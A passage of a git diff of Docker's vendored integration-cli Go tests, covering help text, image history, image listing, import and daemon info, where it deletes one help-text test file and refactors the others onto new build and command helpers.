-	icmd "github.com/docker/docker/pkg/integration/cmd"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestHelpTextVerify(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-
-	// Make sure main help text fits within 80 chars and that
-	// on non-windows system we use ~ when possible (to shorten things).
-	// Test for HOME set to its default value and set to "/" on linux
-	// Yes on windows setting up an array and looping (right now) isn't
-	// necessary because we just have one value, but we'll need the
-	// array/loop on linux so we might as well set it up so that we can
-	// test any number of home dirs later on and all we need to do is
-	// modify the array - the rest of the testing infrastructure should work
-	homes := []string{homedir.Get()}
-
-	// Non-Windows machines need to test for this special case of $HOME
-	if runtime.GOOS != "windows" {
-		homes = append(homes, "/")
-	}
-
-	homeKey := homedir.Key()
-	baseEnvs := appendBaseEnv(true)
-
-	// Remove HOME env var from list so we can add a new value later.
-	for i, env := range baseEnvs {
-		if strings.HasPrefix(env, homeKey+"=") {
-			baseEnvs = append(baseEnvs[:i], baseEnvs[i+1:]...)
-			break
-		}
-	}
-
-	for _, home := range homes {
-
-		// Dup baseEnvs and add our new HOME value
-		newEnvs := make([]string, len(baseEnvs)+1)
-		copy(newEnvs, baseEnvs)
-		newEnvs[len(newEnvs)-1] = homeKey + "=" + home
-
-		scanForHome := runtime.GOOS != "windows" && home != "/"
-
-		// Check main help text to make sure its not over 80 chars
-		helpCmd := exec.Command(dockerBinary, "help")
-		helpCmd.Env = newEnvs
-		out, _, err := runCommandWithOutput(helpCmd)
-		c.Assert(err, checker.IsNil, check.Commentf(out))
-		lines := strings.Split(out, "\n")
-		for _, line := range lines {
-			// All lines should not end with a space
-			c.Assert(line, checker.Not(checker.HasSuffix), " ", check.Commentf("Line should not end with a space"))
-
-			if scanForHome && strings.Contains(line, `=`+home) {
-				c.Fatalf("Line should use '%q' instead of %q:\n%s", homedir.GetShortcutString(), home, line)
-			}
-			if runtime.GOOS != "windows" {
-				i := strings.Index(line, homedir.GetShortcutString())
-				if i >= 0 && i != len(line)-1 && line[i+1] != '/' {
-					c.Fatalf("Main help should not have used home shortcut:\n%s", line)
-				}
-			}
-		}
-
-		// Make sure each cmd's help text fits within 90 chars and that
-		// on non-windows system we use ~ when possible (to shorten things).
-		// Pull the list of commands from the "Commands:" section of docker help
-		helpCmd = exec.Command(dockerBinary, "help")
-		helpCmd.Env = newEnvs
-		out, _, err = runCommandWithOutput(helpCmd)
-		c.Assert(err, checker.IsNil, check.Commentf(out))
-		i := strings.Index(out, "Commands:")
-		c.Assert(i, checker.GreaterOrEqualThan, 0, check.Commentf("Missing 'Commands:' in:\n%s", out))
-
-		cmds := []string{}
-		// Grab all chars starting at "Commands:"
-		helpOut := strings.Split(out[i:], "\n")
-		// Skip first line, it is just "Commands:"
-		helpOut = helpOut[1:]
-
-		// Create the list of commands we want to test
-		cmdsToTest := []string{}
-		for _, cmd := range helpOut {
-			// Stop on blank line or non-idented line
-			if cmd == "" || !unicode.IsSpace(rune(cmd[0])) {
-				break
-			}
-
-			// Grab just the first word of each line
-			cmd = strings.Split(strings.TrimSpace(cmd), " ")[0]
-			cmds = append(cmds, cmd) // Saving count for later
-
-			cmdsToTest = append(cmdsToTest, cmd)
-		}
-
-		// Add some 'two word' commands - would be nice to automatically
-		// calculate this list - somehow
-		cmdsToTest = append(cmdsToTest, "volume create")
-		cmdsToTest = append(cmdsToTest, "volume inspect")
-		cmdsToTest = append(cmdsToTest, "volume ls")
-		cmdsToTest = append(cmdsToTest, "volume rm")
-		cmdsToTest = append(cmdsToTest, "network connect")
-		cmdsToTest = append(cmdsToTest, "network create")
-		cmdsToTest = append(cmdsToTest, "network disconnect")
-		cmdsToTest = append(cmdsToTest, "network inspect")
-		cmdsToTest = append(cmdsToTest, "network ls")
-		cmdsToTest = append(cmdsToTest, "network rm")
-
-		if experimentalDaemon {
-			cmdsToTest = append(cmdsToTest, "checkpoint create")
-			cmdsToTest = append(cmdsToTest, "checkpoint ls")
-			cmdsToTest = append(cmdsToTest, "checkpoint rm")
-		}
-
-		// Divide the list of commands into go routines and  run the func testcommand on the commands in parallel
-		// to save runtime of test
-
-		errChan := make(chan error)
-
-		for index := 0; index < len(cmdsToTest); index++ {
-			go func(index int) {
-				errChan <- testCommand(cmdsToTest[index], newEnvs, scanForHome, home)
-			}(index)
-		}
-
-		for index := 0; index < len(cmdsToTest); index++ {
-			err := <-errChan
-			if err != nil {
-				c.Fatal(err)
-			}
-		}
-	}
-}
-
-func (s *DockerSuite) TestHelpExitCodesHelpOutput(c *check.C) {
-	// Test to make sure the exit code and output (stdout vs stderr) of
-	// various good and bad cases are what we expect
-
-	// docker : stdout=all, stderr=empty, rc=0
-	out, _, err := dockerCmdWithError()
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	// Be really pick
-	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker'\n"))
-
-	// docker help: stdout=all, stderr=empty, rc=0
-	out, _, err = dockerCmdWithError("help")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	// Be really pick
-	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker help'\n"))
-
-	// docker --help: stdout=all, stderr=empty, rc=0
-	out, _, err = dockerCmdWithError("--help")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	// Be really pick
-	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker --help'\n"))
-
-	// docker inspect busybox: stdout=all, stderr=empty, rc=0
-	// Just making sure stderr is empty on valid cmd
-	out, _, err = dockerCmdWithError("inspect", "busybox")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	// Be really pick
-	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker inspect busyBox'\n"))
-
-	// docker rm: stdout=empty, stderr=all, rc!=0
-	// testing the min arg error msg
-	cmd := exec.Command(dockerBinary, "rm")
-	stdout, stderr, _, err := runCommandWithStdoutStderr(cmd)
-	c.Assert(err, checker.NotNil)
-	c.Assert(stdout, checker.Equals, "")
-	// Should not contain full help text but should contain info about
-	// # of args and Usage line
-	c.Assert(stderr, checker.Contains, "requires at least 1 argument", check.Commentf("Missing # of args text from 'docker rm'\n"))
-
-	// docker rm NoSuchContainer: stdout=empty, stderr=all, rc=0
-	// testing to make sure no blank line on error
-	cmd = exec.Command(dockerBinary, "rm", "NoSuchContainer")
-	stdout, stderr, _, err = runCommandWithStdoutStderr(cmd)
-	c.Assert(err, checker.NotNil)
-	c.Assert(len(stderr), checker.Not(checker.Equals), 0)
-	c.Assert(stdout, checker.Equals, "")
-	// Be really picky
-	c.Assert(stderr, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker rm'\n"))
-
-	// docker BadCmd: stdout=empty, stderr=all, rc=0
-	cmd = exec.Command(dockerBinary, "BadCmd")
-	stdout, stderr, _, err = runCommandWithStdoutStderr(cmd)
-	c.Assert(err, checker.NotNil)
-	c.Assert(stdout, checker.Equals, "")
-	c.Assert(stderr, checker.Equals, "docker: 'BadCmd' is not a docker command.\nSee 'docker --help'\n", check.Commentf("Unexcepted output for 'docker badCmd'\n"))
-}
-
-func testCommand(cmd string, newEnvs []string, scanForHome bool, home string) error {
-
-	args := strings.Split(cmd+" --help", " ")
-
-	// Check the full usage text
-	helpCmd := exec.Command(dockerBinary, args...)
-	helpCmd.Env = newEnvs
-	out, stderr, _, err := runCommandWithStdoutStderr(helpCmd)
-	if len(stderr) != 0 {
-		return fmt.Errorf("Error on %q help. non-empty stderr:%q\n", cmd, stderr)
-	}
-	if strings.HasSuffix(out, "\n\n") {
-		return fmt.Errorf("Should not have blank line on %q\n", cmd)
-	}
-	if !strings.Contains(out, "--help") {
-		return fmt.Errorf("All commands should mention '--help'. Command '%v' did not.\n", cmd)
-	}
-
-	if err != nil {
-		return fmt.Errorf(out)
-	}
-
-	// Check each line for lots of stuff
-	lines := strings.Split(out, "\n")
-	for _, line := range lines {
-		i := strings.Index(line, "~")
-		if i >= 0 && i != len(line)-1 && line[i+1] != '/' {
-			return fmt.Errorf("Help for %q should not have used ~:\n%s", cmd, line)
-		}
-
-		// If a line starts with 4 spaces then assume someone
-		// added a multi-line description for an option and we need
-		// to flag it
-		if strings.HasPrefix(line, "    ") &&
-			!strings.HasPrefix(strings.TrimLeft(line, " "), "--") {
-			return fmt.Errorf("Help for %q should not have a multi-line option", cmd)
-		}
-
-		// Options should NOT end with a period
-		if strings.HasPrefix(line, "  -") && strings.HasSuffix(line, ".") {
-			return fmt.Errorf("Help for %q should not end with a period: %s", cmd, line)
-		}
-
-		// Options should NOT end with a space
-		if strings.HasSuffix(line, " ") {
-			return fmt.Errorf("Help for %q should not end with a space: %s", cmd, line)
-		}
-
-	}
-
-	// For each command make sure we generate an error
-	// if we give a bad arg
-	args = strings.Split(cmd+" --badArg", " ")
-
-	out, _, err = dockerCmdWithError(args...)
-	if err == nil {
-		return fmt.Errorf(out)
-	}
-
-	// Be really picky
-	if strings.HasSuffix(stderr, "\n\n") {
-		return fmt.Errorf("Should not have a blank line at the end of 'docker rm'\n")
-	}
-
-	// Now make sure that each command will print a short-usage
-	// (not a full usage - meaning no opts section) if we
-	// are missing a required arg or pass in a bad arg
-
-	// These commands will never print a short-usage so don't test
-	noShortUsage := map[string]string{
-		"images":        "",
-		"login":         "",
-		"logout":        "",
-		"network":       "",
-		"stats":         "",
-		"volume create": "",
-	}
-
-	if _, ok := noShortUsage[cmd]; !ok {
-		// skipNoArgs are ones that we don't want to try w/o
-		// any args. Either because it'll hang the test or
-		// lead to incorrect test result (like false negative).
-		// Whatever the reason, skip trying to run w/o args and
-		// jump to trying with a bogus arg.
-		skipNoArgs := map[string]struct{}{
-			"daemon": {},
-			"events": {},
-			"load":   {},
-		}
-
-		var result *icmd.Result
-		if _, ok := skipNoArgs[cmd]; !ok {
-			result = dockerCmdWithResult(strings.Split(cmd, " ")...)
-		}
-
-		// If its ok w/o any args then try again with an arg
-		if result == nil || result.ExitCode == 0 {
-			result = dockerCmdWithResult(strings.Split(cmd+" badArg", " ")...)
-		}
-
-		if err := result.Compare(icmd.Expected{
-			Out:      icmd.None,
-			Err:      "\nUsage:",
-			ExitCode: 1,
-		}); err != nil {
-			return err
-		}
-
-		stderr := result.Stderr()
-		// Shouldn't have full usage
-		if strings.Contains(stderr, "--help=false") {
-			return fmt.Errorf("Should not have full usage on %q:%v", result.Cmd.Args, stderr)
-		}
-		if strings.HasSuffix(stderr, "\n\n") {
-			return fmt.Errorf("Should not have a blank line on %q\n%v", result.Cmd.Args, stderr)
-		}
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go
index 9979080b1c..43c4b94334 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go
@@ -6,7 +6,8 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
 )
 
@@ -14,7 +15,7 @@ import (
 // sort is not predictable it doesn't always fail.
 func (s *DockerSuite) TestBuildHistory(c *check.C) {
 	name := "testbuildhistory"
-	_, err := buildImage(name, `FROM `+minimalBaseImage()+`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
 LABEL label.A="A"
 LABEL label.B="B"
 LABEL label.C="C"
@@ -40,12 +41,9 @@ LABEL label.V="V"
 LABEL label.W="W"
 LABEL label.X="X"
 LABEL label.Y="Y"
-LABEL label.Z="Z"`,
-		true)
+LABEL label.Z="Z"`))
 
-	c.Assert(err, checker.IsNil)
-
-	out, _ := dockerCmd(c, "history", "testbuildhistory")
+	out, _ := dockerCmd(c, "history", name)
 	actualValues := strings.Split(out, "\n")[1:27]
 	expectedValues := [26]string{"Z", "Y", "X", "W", "V", "U", "T", "S", "R", "Q", "P", "O", "N", "M", "L", "K", "J", "I", "H", "G", "F", "E", "D", "C", "B", "A"}
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go
index 3b678a2586..0dd319fbc9 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go
@@ -10,9 +10,11 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestImagesEnsureImageIsListed(c *check.C) {
@@ -45,20 +47,17 @@ func (s *DockerSuite) TestImagesEnsureImageWithBadTagIsNotListed(c *check.C) {
 }
 
 func (s *DockerSuite) TestImagesOrderedByCreationDate(c *check.C) {
-	id1, err := buildImage("order:test_a",
-		`FROM busybox
-                MAINTAINER dockerio1`, true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, "order:test_a", build.WithDockerfile(`FROM busybox
+                MAINTAINER dockerio1`))
+	id1 := getIDByName(c, "order:test_a")
 	time.Sleep(1 * time.Second)
-	id2, err := buildImage("order:test_c",
-		`FROM busybox
-                MAINTAINER dockerio2`, true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, "order:test_c", build.WithDockerfile(`FROM busybox
+                MAINTAINER dockerio2`))
+	id2 := getIDByName(c, "order:test_c")
 	time.Sleep(1 * time.Second)
-	id3, err := buildImage("order:test_b",
-		`FROM busybox
-                MAINTAINER dockerio3`, true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, "order:test_b", build.WithDockerfile(`FROM busybox
+                MAINTAINER dockerio3`))
+	id3 := getIDByName(c, "order:test_b")
 
 	out, _ := dockerCmd(c, "images", "-q", "--no-trunc")
 	imgs := strings.Split(out, "\n")
@@ -77,20 +76,17 @@ func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) {
 	imageName1 := "images_filter_test1"
 	imageName2 := "images_filter_test2"
 	imageName3 := "images_filter_test3"
-	image1ID, err := buildImage(imageName1,
-		`FROM busybox
-                 LABEL match me`, true)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, imageName1, build.WithDockerfile(`FROM busybox
+                 LABEL match me`))
+	image1ID := getIDByName(c, imageName1)
 
-	image2ID, err := buildImage(imageName2,
-		`FROM busybox
-                 LABEL match="me too"`, true)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, imageName2, build.WithDockerfile(`FROM busybox
+                 LABEL match="me too"`))
+	image2ID := getIDByName(c, imageName2)
 
-	image3ID, err := buildImage(imageName3,
-		`FROM busybox
-                 LABEL nomatch me`, true)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, imageName3, build.WithDockerfile(`FROM busybox
+                 LABEL nomatch me`))
+	image3ID := getIDByName(c, imageName3)
 
 	out, _ := dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match")
 	out = strings.TrimSpace(out)
@@ -104,7 +100,7 @@ func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) {
 }
 
 // Regression : #15659
-func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) {
+func (s *DockerSuite) TestCommitWithFilterLabel(c *check.C) {
 	// Create a container
 	dockerCmd(c, "run", "--name", "bar", "busybox", "/bin/sh")
 	// Commit with labels "using changes"
@@ -117,15 +113,15 @@ func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) {
 }
 
 func (s *DockerSuite) TestImagesFilterSinceAndBefore(c *check.C) {
-	imageID1, err := buildImage("image:1", `FROM `+minimalBaseImage()+`
-LABEL number=1`, true)
-	c.Assert(err, checker.IsNil)
-	imageID2, err := buildImage("image:2", `FROM `+minimalBaseImage()+`
-LABEL number=2`, true)
-	c.Assert(err, checker.IsNil)
-	imageID3, err := buildImage("image:3", `FROM `+minimalBaseImage()+`
-LABEL number=3`, true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, "image:1", build.WithDockerfile(`FROM `+minimalBaseImage()+`
+LABEL number=1`))
+	imageID1 := getIDByName(c, "image:1")
+	buildImageSuccessfully(c, "image:2", build.WithDockerfile(`FROM `+minimalBaseImage()+`
+LABEL number=2`))
+	imageID2 := getIDByName(c, "image:2")
+	buildImageSuccessfully(c, "image:3", build.WithDockerfile(`FROM `+minimalBaseImage()+`
+LABEL number=3`))
+	imageID3 := getIDByName(c, "image:3")
 
 	expected := []string{imageID3, imageID2}
 
@@ -185,13 +181,16 @@ func assertImageList(out string, expected []string) bool {
 	return true
 }
 
+// FIXME(vdemeester) should be a unit test on `docker image ls`
 func (s *DockerSuite) TestImagesFilterSpaceTrimCase(c *check.C) {
 	imageName := "images_filter_test"
-	buildImage(imageName,
-		`FROM busybox
+	// Build a image and fail to build so that we have dangling images ?
+	buildImage(imageName, build.WithDockerfile(`FROM busybox
                  RUN touch /test/foo
                  RUN touch /test/bar
-                 RUN touch /test/baz`, true)
+                 RUN touch /test/baz`)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 
 	filters := []string{
 		"dangling=true",
@@ -250,6 +249,7 @@ func (s *DockerSuite) TestImagesEnsureDanglingImageOnlyListedOnce(c *check.C) {
 
 }
 
+// FIXME(vdemeester) should be a unit test for `docker image ls`
 func (s *DockerSuite) TestImagesWithIncorrectFilter(c *check.C) {
 	out, _, err := dockerCmdWithError("images", "-f", "dangling=invalid")
 	c.Assert(err, check.NotNil)
@@ -261,32 +261,33 @@ func (s *DockerSuite) TestImagesEnsureOnlyHeadsImagesShown(c *check.C) {
         FROM busybox
         MAINTAINER docker
         ENV foo bar`
-
-	head, out, err := buildImageWithOut("scratch-image", dockerfile, false)
-	c.Assert(err, check.IsNil)
+	name := "scratch-image"
+	result := buildImage(name, build.WithDockerfile(dockerfile))
+	result.Assert(c, icmd.Success)
+	id := getIDByName(c, name)
 
 	// this is just the output of docker build
 	// we're interested in getting the image id of the MAINTAINER instruction
 	// and that's located at output, line 5, from 7 to end
-	split := strings.Split(out, "\n")
+	split := strings.Split(result.Combined(), "\n")
 	intermediate := strings.TrimSpace(split[5][7:])
 
-	out, _ = dockerCmd(c, "images")
+	out, _ := dockerCmd(c, "images")
 	// images shouldn't show non-heads images
 	c.Assert(out, checker.Not(checker.Contains), intermediate)
 	// images should contain final built images
-	c.Assert(out, checker.Contains, stringid.TruncateID(head))
+	c.Assert(out, checker.Contains, stringid.TruncateID(id))
 }
 
 func (s *DockerSuite) TestImagesEnsureImagesFromScratchShown(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows does not support FROM scratch
-
 	dockerfile := `
         FROM scratch
         MAINTAINER docker`
 
-	id, _, err := buildImageWithOut("scratch-image", dockerfile, false)
-	c.Assert(err, check.IsNil)
+	name := "scratch-image"
+	buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile))
+	id := getIDByName(c, name)
 
 	out, _ := dockerCmd(c, "images")
 	// images should contain images built from scratch
@@ -299,9 +300,10 @@ func (s *DockerSuite) TestImagesEnsureImagesFromBusyboxShown(c *check.C) {
 	dockerfile := `
         FROM busybox
         MAINTAINER docker`
+	name := "busybox-image"
 
-	id, _, err := buildImageWithOut("busybox-image", dockerfile, false)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile))
+	id := getIDByName(c, name)
 
 	out, _ := dockerCmd(c, "images")
 	// images should contain images built from busybox
@@ -334,7 +336,7 @@ func (s *DockerSuite) TestImagesFormat(c *check.C) {
 	expected := []string{"myimage", "myimage"}
 	var names []string
 	names = append(names, lines...)
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+	c.Assert(names, checker.DeepEquals, expected, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
 }
 
 // ImagesDefaultFormatAndQuiet
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go
index 57dc2a6698..9f8e915803 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go
@@ -9,9 +9,10 @@ import (
 	"regexp"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestImportDisplay(c *check.C) {
@@ -19,7 +20,7 @@ func (s *DockerSuite) TestImportDisplay(c *check.C) {
 	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
 	cleanedContainerID := strings.TrimSpace(out)
 
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "export", cleanedContainerID),
 		exec.Command(dockerBinary, "import", "-"),
 	)
@@ -51,11 +52,10 @@ func (s *DockerSuite) TestImportFile(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
 	defer os.Remove(temporaryFile.Name())
 
-	runCmd := exec.Command(dockerBinary, "export", "test-import")
-	runCmd.Stdout = bufio.NewWriter(temporaryFile)
-
-	_, err = runCommand(runCmd)
-	c.Assert(err, checker.IsNil, check.Commentf("failed to export a container"))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "export", "test-import"},
+		Stdout:  bufio.NewWriter(temporaryFile),
+	}).Assert(c, icmd.Success)
 
 	out, _ := dockerCmd(c, "import", temporaryFile.Name())
 	c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't"))
@@ -73,14 +73,12 @@ func (s *DockerSuite) TestImportGzipped(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
 	defer os.Remove(temporaryFile.Name())
 
-	runCmd := exec.Command(dockerBinary, "export", "test-import")
 	w := gzip.NewWriter(temporaryFile)
-	runCmd.Stdout = w
-
-	_, err = runCommand(runCmd)
-	c.Assert(err, checker.IsNil, check.Commentf("failed to export a container"))
-	err = w.Close()
-	c.Assert(err, checker.IsNil, check.Commentf("failed to close gzip writer"))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "export", "test-import"},
+		Stdout:  w,
+	}).Assert(c, icmd.Success)
+	c.Assert(w.Close(), checker.IsNil, check.Commentf("failed to close gzip writer"))
 	temporaryFile.Close()
 	out, _ := dockerCmd(c, "import", temporaryFile.Name())
 	c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't"))
@@ -98,11 +96,10 @@ func (s *DockerSuite) TestImportFileWithMessage(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
 	defer os.Remove(temporaryFile.Name())
 
-	runCmd := exec.Command(dockerBinary, "export", "test-import")
-	runCmd.Stdout = bufio.NewWriter(temporaryFile)
-
-	_, err = runCommand(runCmd)
-	c.Assert(err, checker.IsNil, check.Commentf("failed to export a container"))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "export", "test-import"},
+		Stdout:  bufio.NewWriter(temporaryFile),
+	}).Assert(c, icmd.Success)
 
 	message := "Testing commit message"
 	out, _ := dockerCmd(c, "import", "-m", message, temporaryFile.Name())
@@ -129,22 +126,17 @@ func (s *DockerSuite) TestImportFileNonExistentFile(c *check.C) {
 
 func (s *DockerSuite) TestImportWithQuotedChanges(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	dockerCmd(c, "run", "--name", "test-import", "busybox", "true")
+	cli.DockerCmd(c, "run", "--name", "test-import", "busybox", "true")
 
 	temporaryFile, err := ioutil.TempFile("", "exportImportTest")
 	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
 	defer os.Remove(temporaryFile.Name())
 
-	result := icmd.RunCmd(icmd.Cmd{
-		Command: binaryWithArgs("export", "test-import"),
-		Stdout:  bufio.NewWriter(temporaryFile),
-	})
-	c.Assert(result, icmd.Matches, icmd.Success)
+	cli.Docker(cli.Args("export", "test-import"), cli.WithStdout(bufio.NewWriter(temporaryFile))).Assert(c, icmd.Success)
 
-	result = dockerCmdWithResult("import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name())
-	c.Assert(result, icmd.Matches, icmd.Success)
+	result := cli.DockerCmd(c, "import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name())
 	image := strings.TrimSpace(result.Stdout())
 
-	result = dockerCmdWithResult("run", "--rm", image, "true")
-	c.Assert(result, icmd.Matches, icmd.Expected{Out: icmd.None})
+	result = cli.DockerCmd(c, "run", "--rm", image, "true")
+	result.Assert(c, icmd.Expected{Out: icmd.None})
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go
index 62ce7e22f2..65091029ee 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go
@@ -6,7 +6,9 @@ import (
 	"net"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/daemon"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
 	"github.com/go-check/check"
 )
 
@@ -35,15 +37,15 @@ func (s *DockerSuite) TestInfoEnsureSucceeds(c *check.C) {
 		"Live Restore Enabled:",
 	}
 
-	if daemonPlatform == "linux" {
+	if testEnv.OSType == "linux" {
 		stringsToCheck = append(stringsToCheck, "Init Binary:", "Security Options:", "containerd version:", "runc version:", "init version:")
 	}
 
-	if DaemonIsLinux.Condition() {
+	if DaemonIsLinux() {
 		stringsToCheck = append(stringsToCheck, "Runtimes:", "Default Runtime: runc")
 	}
 
-	if experimentalDaemon {
+	if testEnv.DaemonInfo.ExperimentalBuild {
 		stringsToCheck = append(stringsToCheck, "Experimental: true")
 	} else {
 		stringsToCheck = append(stringsToCheck, "Experimental: false")
@@ -70,12 +72,11 @@ func (s *DockerSuite) TestInfoFormat(c *check.C) {
 func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) {
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 
-	d := NewDaemon(c)
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 	discoveryBackend := "consul://consuladdr:consulport/some/path"
 	discoveryAdvertise := "1.1.1.1:2375"
-	err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise))
-	c.Assert(err, checker.IsNil)
-	defer d.Stop()
+	d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise))
+	defer d.Stop(c)
 
 	out, err := d.Cmd("info")
 	c.Assert(err, checker.IsNil)
@@ -88,16 +89,16 @@ func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) {
 func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) {
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 
-	d := NewDaemon(c)
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 	discoveryBackend := "consul://consuladdr:consulport/some/path"
 
 	// --cluster-advertise with an invalid string is an error
-	err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid")
-	c.Assert(err, checker.Not(checker.IsNil))
+	err := d.StartWithError(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid")
+	c.Assert(err, checker.NotNil)
 
 	// --cluster-advertise without --cluster-store is also an error
-	err = d.Start("--cluster-advertise=1.1.1.1:2375")
-	c.Assert(err, checker.Not(checker.IsNil))
+	err = d.StartWithError("--cluster-advertise=1.1.1.1:2375")
+	c.Assert(err, checker.NotNil)
 }
 
 // TestInfoDiscoveryAdvertiseInterfaceName verifies that a daemon run with `--cluster-advertise`
@@ -105,13 +106,12 @@ func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) {
 func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) {
 	testRequires(c, SameHostDaemon, Network, DaemonIsLinux)
 
-	d := NewDaemon(c)
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 	discoveryBackend := "consul://consuladdr:consulport/some/path"
 	discoveryAdvertise := "eth0"
 
-	err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise))
-	c.Assert(err, checker.IsNil)
-	defer d.Stop()
+	d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise))
+	defer d.Stop(c)
 
 	iface, err := net.InterfaceByName(discoveryAdvertise)
 	c.Assert(err, checker.IsNil)
@@ -130,51 +130,56 @@ func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) {
 func (s *DockerSuite) TestInfoDisplaysRunningContainers(c *check.C) {
